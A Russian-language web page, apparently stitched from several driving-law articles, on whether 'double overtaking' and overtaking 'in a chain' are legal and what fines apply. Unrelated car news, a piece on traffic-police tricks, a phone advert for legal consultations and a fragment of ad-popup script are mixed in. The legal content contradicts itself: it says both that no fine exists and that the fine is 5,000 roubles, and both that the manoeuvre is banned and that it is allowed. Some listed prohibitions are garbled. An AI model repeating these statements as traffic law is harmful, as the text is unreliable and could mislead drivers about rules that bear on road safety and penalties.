Пдд двойной обгон

Предусмотрен ли правилами дорожного движения штраф за двойной обгон

Для водителей есть одно неписаное правило — «Не уверен — не обгоняй!». Об этом не стоит забывать и, соответственно, не создавать себе лишних препятствий на дороге. Тем более, не зря житейская мудрость говорит — «поспешай, не торопясь». Но в том и состоит закавыка, что очередные непредвиденные обстоятельства заставляют человека торопиться и нарушать правила движения. Нередко даже приходиться совершать двойной обгон. И, как результат — происходит дорожно-транспортное происшествие.

Необходимость в проведении опережения и обгона

Обгон — это взаимодействие трёх последовательных движений автомобиля на дороге.

Машина перестраивается на движение вперёд по встречной полосе, идёт на объезд и занимает прежнее место в полосе. Такое передвижение совершается на дороге часто. И владельцам автотранспорта надо быть уверенным в том, когда можно это делать, а в каком случае — нельзя. Ошибка автомобилиста обойдётся ему серьёзным штрафом. Более того, автовладельца могут лишить водительских прав на долгое время.

Есть водители с солидным водительским стажем, которым трудно различить понятия — опережение и обгон. Но неправильное понимание этих терминов ведёт к частым разбирательствам с инспекторами и даже — авариям.

Опережение связано с продвижением транспорта по дороге с превышением скорости рядом двигающихся автомобилей. В этом варианте не происходит выход на встречную полосу. И, в отличие от обгона, опережение возможно проводить как с левой, так и с правой стороны.

Автомобилистам надо правильно разбираться в том, что такое двойной обгон. В том случае, когда он совершается следом за объезжающим авто, процесс называют «паровозиком» или «гуськом» и считают двойным обгоном.

Как правило, это разрешается автомобилю, выехавшему первым. Практически все остальные участники движения, которые следуют за первым, уже нарушают правила. Они и создают «паровозик».

Полотно дороги слабо просматривается, водители не оценивают ситуацию и происходит дорожно-транспортное происшествие.

Как правильно выполнить

Чтобы ездить правильно, нужно соблюдать не только правила, но и быть внимательным.

  1. Обгонять ТС надо в полной уверенности, что в поле зрения нет запрещающего знака или разметки.
  2. Целесообразно проверять наличие на полосе машин и места для манёвра.
  3. Затем водителю следует включить левый поворотный сигнал, понизить передачу, но при этом повысить обороты двигателя и до упора нажать на педаль газа.

Теперь водитель, выезжающий на встречную, не подрезает машину на обгоне, а проезжает чуть-чуть вперёд.

Правила об обгоне

Картинки двойного обгона в учебнике по вождению покажут любому водителю, как правильно совершать движения по манёвру. Зная пункт 11 ПДД, перед началом обгона обязательно нужно быть предельно уверенным, что на встречной полосе нет транспорта. Правила не включают в себя такого понятия, как двойной обгон.

Но в них прописано, что подобный вид маневрирования не проводят в случае, если:

  • впереди идущий автомобиль не включил левый поворотный сигнал и начал выезжать для обгона машины, находящейся перед ним;
  • движущееся за ним авто приступило к обгону;
  • будет невозможно завершить перестановку без помех для обгоняемого авто.

Нужно следить, чтобы своими манёврами не создать препятствий остальным участникам дорожного движения.

Когда запрещено и когда разрешено обгонять

Не все водители дисциплинированны. Многие считают личные желания и стремления преимуществом перед другими автовладельцами и ездят так, как считают нужным, а не по правилам.

Такие сцены часто можно видеть на российских дорогах:

  1. Водитель проводит обгон на перекрёстке, либо двигается по второстепенной полосе.
  2. Действие происходит на пешеходных дорожках.
  3. Транспорт подъезжает к железнодорожным путям на расстояние 10 метров.
  4. Автомобиль завершает крутой подъем в зоне низкой видимости.

Именно из-за таких автомобилистов в дорожные правила внесены следующие запреты на обгон:

  • возле перекрёстков, как одних из самых опасных участков;
  • вблизи переходов для пешеходов, вне зависимости от нахождения там пешеходов;
  • вблизи железнодорожных переездов, при дистанции прилегания 100 метров;
  • при движении по мосту;
  • на поворотах, невидимых участках дороги, на подъёмах;
  • на дорогах, где стоит знак запрещения обгона;
  • при наличии свободного места на встречной полосе;
  • если на дороге нет ТС, объезжающего авто впереди или сзади;
  • при движении впереди машины с включённым левым поворотом.

Если инспектор успеет пресечь такие нарушения, пассажиры отделаются лёгким испугом, а их водитель — административным наказанием. Если водителя некому было образумить, он скорее всего попадёт в хронику происшествий дня.

Вместе с тем, Правилами не запрещается выезжать на встречную полосу дороги, чтобы обогнать несколько машин, учитывая, что водитель убедился в том, что совершать такое перестроение безопасно.

За что штраф

В Правилах дорожного движения не предусмотрен штраф именно за двойной обгон. Но, совершая такой опасный для жизни вид перестроения, владельцы авто могут нарушить другие правила, в результате чего нарушителям будет предъявлен штраф по статье 12.15 КоАП.

Какие нарушения может совершить водитель?

  1. Препятствие объезжается по встречной полосе.
  2. Также предполагается наказание за обгон в случае, если после него владелец авто не возвращается на прежнее место, а обгоняет следующую машину. Водитель вынужден будет оплатить штраф или лишиться прав вождения транспортного средства.

За очередное повторение произведённых ошибок, нарушитель лишается водительского удостоверения на длительный срок. При случае, если момент нарушения снят системами видеонаблюдения, то будет наложен штраф по ч.5 статьи.

Объезд колонны

Согласно п. 1.2 Правил ПДД, образованная на дороге колонна представляет собой группу авто, состоящих из нескольких ТС, которые движутся по одному ряду, включив фары ближнего света. Машины сопровождаются автомобилями с проблесковыми маячками красного и синего цветов.

Колонну определяют по следующим признакам:

  • в одном ряду движутся не менее трёх ТС;
  • в начале колонны движется автомобиль ПС с включёнными огнями;
  • автомобиль сопровождения окрашен в цвет, определяющий ведомство, к которому он относится.

В Правилах указано, что машины, входящие в состав колонны, включают ближний свет. При отсутствии автомобиля сопровождения, обгон колонны будет производиться согласно инструкции.

Обгон путём пересечения сплошной линии

Частенько такой обгон на улицах и трассах происходит по причине нехватки времени у водителей, которым нужно везде успеть. Статистика отмечает рост количества транспорта на дорогах. И в должной мере результат происходящего зависит от хорошего профессионального уровня работников дорожной службы.

В правилах, пересечение разметки 1.1 является серьёзным нарушением, но ГОСТ на наложение дорожной разметки официально не регистрируется. Полоска специальной ширины наносится на полотно дороги в начале сплошной линии. Полоска длиннее обязательной в 3 раза, а в промежутках между линиями короче.

Существование такой схемы даёт знак владельцу ТС, что обгон может заканчиваться на сплошной линии. И доказать свою невиновность в нарушении будет гораздо проще.

При нарушении ч.2 статьи 12.16 КоАП РФ, надо будет заплатить штраф. Взыскание составит от 1000 до 1500 российских рублей, если водитель по встречной объезжал место ДТП, хотя можно было это сделать справа.

Практически всякое нарушение правил, связанное с фактом пересечения сплошной осевой линии разметки, рассматривается в суде. Исключаются только случаи, когда протокол составлен с опорой на информацию систем наблюдения.

Камеры-шпионы установлены на самых сложных участках улиц. Они с успехом заменяют собой машины ДПС, которые обычно подстерегали водителей в таких местах. Автолюбителям больше нет смысла сигналить своим коллегам о том, что в кустах притаился проверяющий. Все, кто за рулём, быстро выучили места расположения мнимых и реальных камер слежения и вынуждены следить за соблюдением правил хотя бы в таких местах. Автоматика равнодушно фиксирует нарушение, и письмо со штрафной квитанцией отправляется по адресу нарушителя, который обязан оплатить штраф.

Однако существует ряд плюсов, благодаря которым инцидент может разрешиться с пользой для водителя. Для этого необходимо проследить, чтобы инспектор внёс в протокол факт несоответствия размещения дорожной разметки государственным стандартам, и максимально верно зафиксировал схему происшествия. Для суда это будет весомым аргументом.

Можно ли произвести обгон трамвая без нарушения закона

Трамвайный путь имеет одну полосу в каждом направлении движения. В п.9.6 Правил движения ясно прописано, что маневрирование и пересечение встречных путей транспортом разрешается. Таким образом, пересечение не является выездом на встречную полосу. А трамвайные пути не являются разделительной полосой.

Начиная маневрировать, водитель должен быть уверенным в незанятости полосы и дорожного пространства для такого действия. У него должно быть не только достаточно места для движения, но и времени, для того, чтобы не создавать помех другим автомобилистам.

Обгон трамвая не запрещается, и в инструкциях нет дорожных знаков и разметок, запрещающих обгонять движущийся трамвай. Но практика показывает, что обычно трамвай обгоняется по встречным путям, за что «лихачи» и лишаются прав управления автомобилем.

Хотелось бы обратить внимание на участки дорог, где совершение подобных перестроений заканчивается летальным исходом. К этому числу причисляются эстакады, мосты, тоннели. Они не менее опасны, чем движение по встречной полосе. Иногда мосты строят так, что их трудно различить издали. Много водителей, начинающих обгон, завершают его в затруднённых для проезда местах. В обязательном порядке там установлены указатели, в частности, знак обгона. Он пронумерован, как 3.20. На табличке изображаются 2 машины, из них — левая красного цвета.

Двойной обгон опасен, так как он сопряжён с другими нарушениями, к примеру, выездом на встречную полосу. Итогом таких манёвров на дороге может быть не только штраф, но и авария с пострадавшими.

Совершая двойной обгон, обязательно учитывать скорость двигающегося впереди ТС, техническое состояние дорог, возможности автомобиля для совершения манёвра. За такое нарушение правил вождения владельцу транспортного средства грозит штраф до 5000 рублей либо лишение водительских прав на полгода. Чтобы проконтролировать степень ответственности участников дорожного движения, было бы неплохо установить в салоне автомобиля видеорегистратор, который будет фиксировать весь путь.

Двойной обгон ПДД

Термин «обгон» означает опережение транспорта, движущегося в одном направлении, данный маневр подразумевает выезд на сторону встречного движения, после чего автомобиль, совершающий маневр, возвращается в свой ряд. Если авто в условиях двухполосного движения опережает другие, занимает левую часть дороги, то это не считается обгоном. Это же касается ситуаций, когда опережение происходит по средней части трехполосного движения.

Важно! Если вы сами разбираете свой случай, связанный с двойным обгоном, то вам следует помнить, что:

  • Все случаи, связанные с обгоном, уникальны и индивидуальны.
  • Понимание основ закона полезно, но не гарантирует достижения результата.
  • Возможность положительного исхода зависит от множества факторов.

Чтобы получить максимально подробную консультацию по своему вопросу, вам достаточно выполнить любой из предложенных вариантов:

  • Обратиться за консультацией через форму.
  • Воспользоваться онлайн чатом в нижнем правом углу.
  • Позвонить:
    • ☎ Федеральный номер: 8 (800) 500-27-29 доб. 844

Обстоятельства, при которых обгон запрещается

  1. Опережение с выездом на встречную полосу не разрешается делать на пересечении нескольких дорог, потому что такие участки считаются опасными.
  2. В целях обеспечения безопасности пешеходов запрещается совершать любые маневры на пешеходных переходах. Правило действует независимо от того, переходит ли в этот момент кто-то дорогу или нет.
  3. Потенциально опасной зоной являются железнодорожные переезды, а именно прилегающая к ним территория в пределах 100 м.
  4. Нельзя выезжать на встречную полосу в тоннелях, во время движения путепроводов, на мостах, эстакадах под ними. Это же касается опасных поворотов, слепых участков, где ограничена видимость.

К типичным ситуациям относится также наличие запрещающего обгон знака. Он имеет вид круга, в котором изображено два автомобиля, справа черный, а слева красный. Такое ограничение действует до первого перекрестка или конечной точки населенного пункта (имеется в виду проезжая часть).

Внимание! Если вы думаете, что обгон автомобилей с правой стороны (по обочине) является официально разрешенным маневром, то сильно ошибаетесь. Это запрещено, за несоблюдение правил грозит административный штраф в размере 1500 рублей.

Правила совершения обгона, когда можно?

«Зеленым светом» для водителей, желающих опередить едущее впереди транспортное средство с выездом на встречную полосу, является:

  • наличие прерывистой осевой линии на двухполосной дороге;
  • смешанная разделительная полоса;
  • две пунктирные линии на трехполосном полотне. Средняя часть дороги может использоваться для обгона участниками движения с обеих соседних сторон.

Интересно! Двойному обгону ПДД не дают конкретного определения, но все водители знают, что подобные маневры строго запрещены. Из названия понятно, что речь идет о попытке опередить одновременно два автомобиля. Этого не рекомендуется делать во избежание дорожно-транспортных происшествий.

Что же касается обычного обгона, то в ПДД детально расписано, какие правила во время маневрирования на дороге следует соблюдать. Первым делом водитель автомобиля должен на 100% убедиться в том, что встречная полоса на безопасном расстоянии свободна. В процессе он оценивает:

  1. скорость движения транспорта, который едет впереди, а также навстречу;
  2. состояние дорожного покрытия;
  3. технические возможности собственного автомобиля.

Если вы видите, что движущийся впереди вас автомобиль собирается совершить обгон, то вы должны подождать, пока он это благополучно сделает. Это же касается ситуаций, когда сзади машина пытается вас обогнать. Выждать нужно и при условии подачи левого сигнала поворота. От того, кого обгоняют, требуется уступить дорогу, не препятствовать движению посредством увеличения скорости.

Есть несколько дорожных знаков, при наличии которых обгон совершать нельзя. Это может быть:

  • круглый указатель с красным обрамлением, где на белом фоне изображено два автомобиля красного и черного цвета;
  • квадратный знак, свидетельствующий о наличии на горизонте пешеходного перехода. На нем обычно изображается дорожная зебра;
  • черный треугольник, в середине которого нарисован дорожный подъем и указан процент наклона;
  • знак, с изображенным красным крестом, дымящимся паровозом, черной оградки, нескольких полос красного цвета, расположенных под углом. Все это является свидетельством того, что скоро на горизонте появится железнодорожный переезд.

Внимание! На дороге действует еще одно неписанное правило «Не уверен — не обгоняй». Его соблюдение является залогом не только вашей безопасности, но и других участников движения.

Порядок действий водителя, планирующего обгон

После того, как вы убедились в безопасности и правомерности опережения с выездом на встречную полосу, нужно включить левый поворотник. Затем устанавливаете пониженную передачу, увеличиваете скорость и выезжаете на полосу со встречным движением, лампочка левого поворота при этом должна оставаться включенной. После того, как ехавший впереди автомобиль благополучно опережен, нужно приступить к возвращению на свою полосу. Для этого включаете правый поворот и на безопасном расстоянии от машины сзади перестраиваетесь на правую полосу. В завершении выключаете лампочку поворота, повышаете передачу и продолжаете движение по дорожному полотну.

Штраф за двойной обгон согласно ПДД составляет 5 тысяч рублей, в качестве наказания также может быть использована мера, подразумевающая лишение прав на вождение сроком от 4 до 6 месяцев. Обгон сразу нескольких автомобилей строго наказывается по причине создания повышенной опасности во время движения.

Если вы не хотите спровоцировать дорожно-транспортное происшествие, тогда прислушайтесь к рекомендациям, которые были выработаны специально для тех, кто не терпит монотонной езды.

  • Скорость обгоняющего автомобиля должна на 15-20 км/ч быть больше обгоняемого транспорта.
  • Интервал между ними должен сохраняться не менее 1,5 м.
  • Если вы находитесь за городом, то перед осуществлением маневра нужно сигналом предупредить водителя транспортного средства, которое планируете опередить.
  • В темное время суток на короткое время следует переключить режим света с дальнего на ближний.

Более детально ознакомиться с тем, как нужно совершать маневр, можно ознакомиться со статьей 11 ПДД РФ.

Разрешён ли двойной обгон и обгон «паровозиком»?

Под двойным обгоном понимается обгон сразу двух или более автомобилей по встречной полосе (без возвращения на свою полосу после обгона первого авто) либо обгон уже обгоняющего автомобиля, а под обгоном «паровозиком» или «гуськом» — когда Вы выезжаете на обгон за уже обгоняющим автомобилем (автомобилями), то есть на встречной полосе сразу две и более обгоняющих машины.


Двойной обгон


Двойной обгон уже обгоняющего


Обгон паровозиком

Разрешены ли двойной обгон и обгон паровозиком на 2019 год, выяснить совсем не сложно, хотя однозначного ответа в ПДД нет. Но мы расставим все точки в этом вопросе!

Какие правила обгона регламентируют правильный манёвр?

Вообще, за правила обгона отвечает целый раздел ПДД. Там указывается обязательное условие безопасности обгона, его запрет при определённых условиях, а также правила поведения обгоняемого авто.

Правила обгона вполне самодостаточны, но наказание предусмотрено всё же не за обгон как таковой, а за выезд в нарушение ПДД на встречную полосу. То есть в принципе обгон обязательно включает в себя выезд на встречку, но вот выезд на встречку не обязательно должен быть обгоном, так как при последнем совершается опережение по встречной полосе других транспортных средств.

Двойной обгон: разрешён или запрещён?

Правила обгона содержат запреты и предписания совершения такого манёвра. Это значит, что если что-то не запрещено, то это разрешено. В частности, в ПДД 2019 года нет никакого запрета на выполнение двойного обгона — сразу нескольких автомобилей, будь их хоть два, хоть три, хоть 20 автомобилей.

Главное условие — водитель обязан убедиться, что такой манёвр будет безопасен для него и для других участников движения. Факт того, убедился он или не убедился, прецедентен, то есть если во время двойного обгона не случилось ДТП, то безопасен, если случилось — опасен, и водитель подлежит лишению прав или штрафу.

Если быть точнее, то по правилам обгона водитель обязан убедиться сразу в нескольких обстоятельствах:

  • встречная полоса свободна на достаточном расстоянии;
  • впереди нет сплошной, знака «Обгон запрещён», пешеходного перехода, ж/д переезда, моста, путепровода, тоннеля или эстакады, конца подъёма, опасного поворота;
  • никто другой впереди и сзади уже не обгоняет его;
  • никто впереди не включил левый поворотник.

Это исчерпывающий список запретов обгона, в том числе двойного.

Разрешён или запрещён обгон паровозиком?

Как мы уже говорили выше, обгон паровозиком — это когда Вы и ещё один или более автомобилей одновременно друг за другом обгоняете другие машины. Но ещё есть понимание двойного обгона не как обгон сразу нескольких автомобилей без возвращения на свою полосу, но и обгон уже обгоняющего автомобиля, когда первый обгоняющий уже на встречной, а второй обгоняющий обгоняет первого, двигаясь далее на полосу дальше.

И вот такой манёвр уже запрещён. Но для кого запрещён обгон паровозиком «гуськом»? Как Вы уже наверняка догадались, для того, кто вторым или последующим выехал на обгон — то есть для того, кто такой обгон паровозиком и создал. Впрочем, если Вы выехали на обгон первым, а уже кто-то другой создал «паровозик» из обгоняющих, то доказать правоту Вам будет легко только при наличии видеорегистратора.

Конкретно обгон паровозиком запрещается пунктом 11.2 ПДД:

11.2. Водителю запрещается выполнять обгон в случаях, если:

  • транспортное средство, движущееся впереди, производит обгон или объезд препятствия;
  • .
  • следующее за ним транспортное средство начало обгон;

Видите, даже если инспектор ГИБДД видел, что Вы двигались при обгоне впереди, это ещё не значит, что он видел, что не Вы выехали на встречную полосу, когда кто-то другой уже производил обгон.

Есть в этом пункте и ещё один момент. Если быть точнее, то это недоработанность. Кроется она во фрагменте «. транспортное средство, движущееся впереди, производит обгон или объезд препятствия. «. А теперь представьте себе дорогу в степи, где видимость впереди десяток-другой километров. По трактовке этого пункта правил обгона Вы не имеете право обгонять, если кто-то впереди даже в 10 километрах от Вас уже обгоняет какое-либо другое транспортное средство. Даже если встречного транспорта нет по всей зоны видимости впереди. Понятно, что данный пункт задумывался для того, чтобы запретить обгонять один и тот же автомобиль паровозиком, но тут и речи не идёт о двойном обгоне.

И поэтому инспектор ДПС, увидевший такую ситуацию, может спокойно подвести Вас под лишение. И, как показывает практика, суды при назачении наказания не учитывают тот факт, что ну всем понятно, что данный пункт задумывался для другого.

Итак, главные ответы на вопросы статьи: в 2019 году двойной обгон разрешён, а обгон паровозиком запрещён сразу двумя трактовками ПДД.

Какое наказание за нарушения правил обгона?

Помните, выше мы писали, что нет наказания за обгон, будь то запрещённый двойной обгон или обгон паровозиком, как таковой? Факт заключается в том, что практически при любом обгоне вменяют часть 4 статьи 12.15 КоАП, которая предусматривает штраф или лишение за выезд в нарушение правил обгона на встречную полосу. Есть также следующая часть этой статьи, предусматривающая ещё более строгое наказание за повторность такого нарушения.

Двойной обгон: Как это происходит и что за него грозит?

После изменений в ПДД, сотрудники ГИБДД трактуют понятие «двойной обгон» по-новому. К примеру, нарушением считается только выезд автомобилиста на встречную полосу и создание тем самым аварийной ситуации. Как происходит двойной обгон и что за него может грозить автомобилистам, стоит рассказать подробнее.

Согласно ПДД. Как гласят ПДД, обгоном считается такой маневр на дорожном полотне, при котором автомобилист намерен выехать на встречную полосу движения, для опережения едущего впереди автомобиля. Понятие «обгон справа», когда водитель объезжает на многополосной дороге по своей полосе, больше не учитывается, а все действия владельца авто в данном случае не наказываются, ведь это считается опережением. Правила дорожного движения в нашей стране опережение не квалифицируют как нарушение.

Многие воспринимают двойной обгон как ситуацию, когда машины идут на опережение нескольких авто, едущих друг за другом на одной полосе, однако это не совсем правильно. Данный маневр законодательство не запрещает, если нет угрозы для встречного транспорта.

Двойной обгон и наказание. Двойной обгон, согласно ПДД, это маневр, при котором автомобиль перестраивается для езды на встречную полосу, чтобы обогнать сразу две или более машины, или же обгон уже обгоняющего других участников дорожного движения водителя. После обгона первого авто, в таком случае, автомобилист на свою полосу движения не возвращается. Подобные действия крайне опасны и несут угрозу не только инициатору, но и другим участникам движения.

За совершение описанного в правилах дорожного движения двойного обгона, законом предусмотрено несколько видов наказания, в том числе:

  • Штраф в размере 5 тысяч рублей
  • Автомобилист лишится водительских прав на срок от четырех месяцев до полугода
  • Лишение прав на срок до 12 месяцев в случае совершения нарушения повторно

На дороге также происходят более опасные ситуации, когда автомобилист начинает идти на обгон, а его обгоняет еще один водитель. В таком случае наказанием для последнего станет 5000 рублей или лишение прав на срок от 4 до 6 месяцев.

Итог. На дороге иногда бывают такие ситуации, что водители идут на риск и совершают двойной обгон. Тем не менее, стоит отметить, что данное нарушение многие владельцы транспортных средств понимают неправильно.

К примеру, на своей полосе водитель идет не на обгон, а совершает опережение, что не наказывается. Однако если автомобилист пошел на обгон, а его опередил еще один водитель, выехав на встречку, последнему грозит серьезное наказание, он даже может лишиться прав.

  • Мы в соцсетях:
  • Одноклассники,
  • Facebook,
  • Вконтакте

Обсудить

Выделите ее и нажмите Ctrl + Enter

Ну если честно я сам совершал двойные обгоны, но теперь точно не буду этого делать потому что права дороже.

Компания Mercedes сообщила первые подробности о салоне Mercedes GLA.

Автомобильный бренд Mercedes раскрыл некоторые подробности об оснащении интерьера новой модели Mercedes GLA. Судя по всему, кроссовер будет оснащён цифровой приборной панелью. Также известно об установке системы контроля слепых зон, которая обладает функцией предупреждения при открытии дверей. Если система распознает рядом другое транспортное средство, она даст специальный звуковой сигнал, который поможет избежать аварийной ситуации.

Для повышения комфорта во время передвижения производитель внедрил инновационную технологию автономного вождения, которая работает за счёт считывания данных с камер видеонаблюдения и специальных датчиков. Также будет добавленa инновационная мультимедийная система MBUX.

Автомобиль будет оснащаться в базовой комплектации 1,3-литровым турбированным двигателем, мощность которого составляет 163 л.с. В более дорогих сборках авто будет оборудовано мотором с мощностью 421 л.с.

Презентация новой версии кроссовера запланирована на 11 декабря текущего года.

В Краснодаре покажут уникальную версию автомобиля Mitsubishi Eclipse с множественными зеркалами.

Automama совместно с популярными блогерами канала Гараж-54, проведут совместный показ необычного автомобиля с 65-ю тысячами зеркал, которые вмонтированы в кузов авто. Относительно недавно данный салон приобрёл новый Mitsubishi Eclipse и решил отдать «народным Кулибиным», в лице профессиональной команды тюнеров Гаража-54.

Примечательно, что кабриолет ещё в 2017 году был популярной темой блогеров. Например, Ильдар Автоподбор называл его лучшим в своём классе за 350 тыс. рублей.

Чтобы создать уникальную машину, понадобилось несколько месяцев работы и большой уровень человеческого терпения, мастерства и выдержки. Всего понадобилось 3 месяца или 1800 часов работы. Над проектом трудились 14 профессионалов, которые тщательно монтировали в кузов около 65 тыс. зеркал и 1000 кубиков.

Для улучшения дизайна команда добавила новые колёсные диски от JDM, светодиодную подсветку дна и необычную установку, которая генерирует дым.

Презентация готовой машины пройдёт 7 декабря текущего года в 12 часов дня в Краснодаре.

Несмотря на растущую популярность камер фото и видеофиксации нарушений правил дорожного движения, система палочной оценки действий ГИБДД все еще остается в силе.

Кроме того, по причине многочисленных сокращений, «кровожадность» сотрудников ГИБДД только увеличилась.

Даже тем водителям, которые уверены в своем знании ПДД наизусть, и считают, что это может на 100% предостеречь их от наложения штрафа, стоит понимать, что они сильно ошибаются в этом вопросе. У работников ДПС имеется достаточное количество разного рода уловок, жертвой которых может стать даже самый законопослушный водитель.

Правота не всегда на стороне пешехода. За последнее время значительно увеличилась частота «развода» владельцев автомобиля, в основе которых лежит якобы непропуск пешехода на нерегулируемом пешеходном переходе. Основывается такое действие на пункте 14.1 ПДД, в котором написано, что водитель в обязательном порядке уступить дорогу пешеходам, которые уже переходят дорогу либо только что вступили на проезжую часть. Размер штрафа за совершение подобного нарушения составляет 1500 рублей.

Но как же поступить, если пешеход, который собирается перебежать улицу, находится на стороне, противоположной движению, и никаким образом ему не препятствует? Согласно Правилам, в таких случаях водитель совершенно не обязан совершить остановку для пропуска пешехода, а определение понятия «уступить дорогу» достаточно четкое. В ситуации, когда необходимо уступить дорогу, водитель не должен начинать, продолжать либо возобновлять движение, а также выполнять любые маневры, если результатом этого может стать принуждение других участников дорожного движения, которые имеют по отношению к нему преимущество, изменить скорость или направление движения.

Другими словами, если автомобиль не создал помехи для пешехода, то и нарушением это называть невозможно. Но это достаточно проблематично объяснить патрулю ДПС, который расположился неподалеку.

Ложное пересечение сплошной. Для осуществления второго такого способа потребуется согласованная работа двух экипажей, причем водителю даже не обязательно совершать нарушение.

Заключается он в том, что на дороге водителя останавливает сотрудник ДПС, и сообщает о том, что несколько километров назад он совершил выезд на полосу встречного движения через сплошную полосу, либо же в зоне действия дорожного знака, запрещающего обгон, тем самым совершив нарушение п 9.2 ПДД. Единственный шанс доказать свою невиновность у водителя имеется в том случае, если в его автомобиле установлен видеорегистратор или же система навигации GPS.

Для большей уверенности, водителя просто берут на испуг, делая расчет на психологию, и он в самом деле начинает думать, что мог совершить данное нарушение.

Наказание же за подобное нарушение достаточно строгое — денежный штраф в размере до 5 тысяч рублей, или же лишение прав на срок от 4 месяцев до полугода. Доказать что либо, скорее всего, будет проблематично, а производить демонстрацию записи, согласно закону, сотрудники ДПС не обязаны. Именно это и становится причиной того, что во избежание риска потери водительских документов, многие водители пытаются решить данный вопрос на месте.

Итог. При остановке водителя сотрудником ДПС, и попытке совершить на него давление с психологической стороны, то есть попытаться убедить в том, что он виновен в нарушении правил дорожного движения, инспектор однозначно нарушает закон. Водителю же, уверенному в себе, следует попытаться использовать все имеющиеся доказательства собственной невиновности, и не идти у сотрудника ГИБДД на поводу.

Двойной обгон: что это такое и как за него наказывают

Двойным обгоном многие ошибочно называют обгон нескольких транспортных средств подряд, двигающихся в одной полосе друг за другом. Этот маневр Правилами не запрещен. Если, конечно, будут соблюдены все остальные требования 11-го раздела этого документа. А именно: не будет создано помех встречным машинам и попутным при возвращении в полосу, обгоняющий не «разорвет» организованную колонну и не выйдет на встречку в том месте, где это запрещено. Иначе говоря, обогнать двух и более тихоходов сразу можно.

На самом же деле двойной обгон – это обгон транспортного средства, которое само уже выполняет аналогичный маневр. Учитывая, что действие по определению сопряжено с выездом на встречную полосу, выглядит подобный поступок крайне безрассудным. Хотя бы потому, что обгоняют в подавляющем большинстве случаев на дорогах с одной полосой в каждую сторону. Где уж там уместиться в ширину трем транспортным средствам? Однако на практике такое все же случается.

Наказание за двойной обгон прямо прописано в КоАП. ПДД запрещают выполнять обгон, если «транспортное средство, движущееся впереди, производит обгон или объезд препятствия». Санкция по статье 12.15.4 КоАП – штраф 5000 рублей или лишение прав на четыре-шесть месяцев. При повторном нарушении в течение года расстаться с правами придется уже на 12 месяцев.

Справедливости ради отметим: немало двойных обгонов получаются вынужденными, когда перед уже вышедшей на встречную полосу машиной высовывается еще один обгоняющий. Тот, кто начал выполнять маневр первым зачастую не тормозит, а уклоняется левее и проскакивает вперед. В этом случае нарушителем оказывается тот, кто вышел на обгон позже. Он нарушил требования раздела 11.2 ПДД: обгон запрещен, если «следующее за ним транспортное средство начало обгон». В этом случае наказание следует по той же статье КоАП 12.15.4: 5000 рублей или от четырех до шести месяцев без прав за «выезд в нарушение ПДД на полосу, предназначенную для встречного движения, либо на трамвайные пути встречного направления».

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
